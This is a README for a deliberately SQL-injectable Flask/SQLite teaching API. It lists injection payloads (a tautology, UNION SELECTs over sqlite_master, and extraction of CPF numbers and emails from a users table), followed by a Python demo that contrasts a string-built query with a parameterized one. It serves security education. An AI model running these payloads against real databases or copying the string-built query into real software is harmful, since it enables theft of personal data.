
guilatrova/flask-sqlinjection-vulnerable

Flask Vulnerable to SQL Injection 💉🔓

The purpose of this repository is to allow us to explore an API vulnerable to SQL Injection (using Python, Flask, and SQLite).

You're free to play with it as is, but you might have more fun doing it alongside me in a blog post: https://blog.guilatrova.dev/how-sql-injection-attack-works-with-examples/.

You can play with the following endpoints (assuming you're running it on localhost):

| Endpoint | Description |
| --- | --- |
| `/challenges/111.111.111-11` | Expected usage |
| `/challenges/' or '1' = '1` | Vulnerability proof |
| `/challenges/' AND '1' = '2' UNION SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%` | Breaks server |
| `/challenges/' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%` | Queries all tables and fixes broken server |
| `/challenges/' AND '1' = '2' UNION SELECT cpf, email FROM users; --` | Use union select to query data from other tables |
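The first four rows of the table, replayed against a string-built query and against its parameterized fix. This is an added example, not code from the repository: the schema, the `title` and `score` columns, the sample rows and the function names are assumptions, and the two-column SELECT is inferred from the table, where the one-column UNION fails and the two-column one works.

```python
import sqlite3

def make_db():
    # Constructed schema and rows; the repository's real tables may differ.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (cpf TEXT, email TEXT);
        CREATE TABLE challenges (cpf TEXT, title TEXT, score INTEGER);
        INSERT INTO users VALUES ('111.111.111-11', 'a@example.test'),
                                 ('222.222.222-22', 'b@example.test');
        INSERT INTO challenges VALUES ('111.111.111-11', 'first', 10),
                                      ('222.222.222-22', 'second', 20);
    """)
    return db

def lookup_vulnerable(db, cpf):
    # Before: the path segment is pasted into the SQL text, so a quote in it
    # ends the string literal and the rest is parsed as SQL.
    sql = f"SELECT title, score FROM challenges WHERE cpf = '{cpf}'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, cpf):
    # After: the value is bound to a placeholder and only ever compared as data.
    sql = "SELECT title, score FROM challenges WHERE cpf = ?"
    return db.execute(sql, (cpf,)).fetchall()

def run(lookup, cpf):
    # Fresh database per call; a SQLite error is returned as text instead of raised.
    try:
        return lookup(make_db(), cpf)
    except sqlite3.Error as exc:
        return f"error: {exc}"

# Inputs copied from the endpoint table (the part after /challenges/).
EXPECTED = "111.111.111-11"
TAUTOLOGY = "' or '1' = '1"
UNION_ONE_COL = ("' AND '1' = '2' UNION SELECT name FROM sqlite_master "
                 "WHERE type ='table' AND name NOT LIKE 'sqlite_%")
UNION_TWO_COL = ("' AND '1' = '2' UNION SELECT 'table_name', name FROM sqlite_master "
                 "WHERE type = 'table' AND name NOT LIKE 'sqlite_%")

if __name__ == "__main__":
    for label, value in [("expected", EXPECTED), ("tautology", TAUTOLOGY),
                         ("union, 1 column", UNION_ONE_COL),
                         ("union, 2 columns", UNION_TWO_COL)]:
        print(label)
        print("  string-built :", run(lookup_vulnerable, value))
        print("  parameterized:", run(lookup_parameterized, value))
```

With the string-built query, the one-column UNION raises a column-count mismatch error, which corresponds to the "Breaks server" row; with the parameterized query every input except the real CPF returns no rows.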
